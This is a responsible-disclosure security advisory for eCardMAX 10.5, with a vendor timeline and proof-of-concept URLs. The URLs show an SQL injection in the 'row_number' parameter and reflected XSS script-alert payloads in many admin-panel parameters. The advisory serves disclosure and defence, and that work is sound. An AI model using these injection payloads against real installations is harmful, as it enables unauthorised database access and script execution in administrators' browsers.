eCardMAX 10.5 SQL Injection and XSS Vulnerabilities [Software] - eCardMAX 10.5 [Vendor] - eCardMAX.COM - http://www.ecardmax.com/ [Vendor Product Description] - eCardMax is the most trusted, powerful and dynamic online ecard software solution. It enables you to create your own ecard website with many of the advanced features found on other major sites. Starting your own ecard website with eCardMax is fast and easy. [Advisory Timeline] - 13/06/2016 -> Vulnerability discovered; - 13/06/2016 -> First contact with vendor; - 13/06/2016 -> Vendor responds asking for details; - 14/06/2016 -> Vulnerability details sent to the vendor; - 17/06/2016 -> Vendor working on a patch; - 28/06/2016 -> Vendor Releases Patch - 01/07/2016 -> Public Security Advisory Published [Bug Summary] - SQL Injection - Cross Site Scripting (Reflected) [Impact] - High [Affected Version] - v10.5 [Tested on] - Apache/2.2.26 - PHP/5.3.28 - MySQL/5.5.49-cll [Bug Description and Proof of Concept] - eCardMAX suffers from a SQL Injection vulnerability. Input passed via the 'row_number' GET parameter is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. - Multiple cross-site scripting vulnerabilities were also discovered. The issue is triggered when input passed via multiple parameters is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. [Proof-of-Concept] 1. SQL Injection: Parameter: row_number (GET) POC URL: http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=10%20order%20by%201--&search_year=2016&page=2 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 2. Cross Site Scripting (Reflected): http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=all&keyword=%3Cscript%3Ealert(1)%3C%2Fscript%3E&cmd_button=Search+User Parameter(s): keyword (GET) http://localhost/ecardmaxdemo/admin/index.php?step=admin_cellphone_carrier&row_number=15&page=14%22%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E Parameter(s): page (GET) http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=10%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search_year=2016&page=2 Parameter(s): row_number (GET) http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display_inactive_account&what=&row_number=15&what2=&cmd_button=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&list_item=%3C/script%3E%3Cscript%3Ealert(2)%3C/script%3E&search_field=%3C/script%3E%3Cscript%3Ealert(3)%3C/script%3E&keyword=&num_day=%3C/script%3E%3Cscript%3Ealert(4)%3C/script%3E&num_what=%3C/script%3E%3Cscript%3Ealert(5)%3C/script%3E&from_month=%3C/script%3E%3Cscript%3Ealert(6)%3C/script%3E&from_day=%3C/script%3E%3Cscript%3Ealert(7)%3C/script%3E&from_year=%3C/script%3E%3Cscript%3Ealert(8)%3C/script%3E&to_day=%3C/script%3E%3Cscript%3Ealert(9)%3C/script%3E&to_month=%3C/script%3E%3Cscript%3Ealert(10)%3C/script%3E&to_year=%3C/script%3E%3Cscript%3Ealert(11)%3C/script%3E&page=2%3C/script%3E%3Cscript%3Ealert(12)%3C/script%3E Parameter(s): cmd_button, list_item, search_field, num_day, num_what, from_month, from_day, from_year, to_day, to_month, to_year, page (GET) http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=user_name_id&cmd_button=Search+User&keyword=833981213299707%22%3E%3Cscript%3Ealert(1)%3C/script%3E Parameter(s): keyword (GET) +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ All flaws described here were discovered and researched by: Bikramaditya Guha aka "PhoenixX"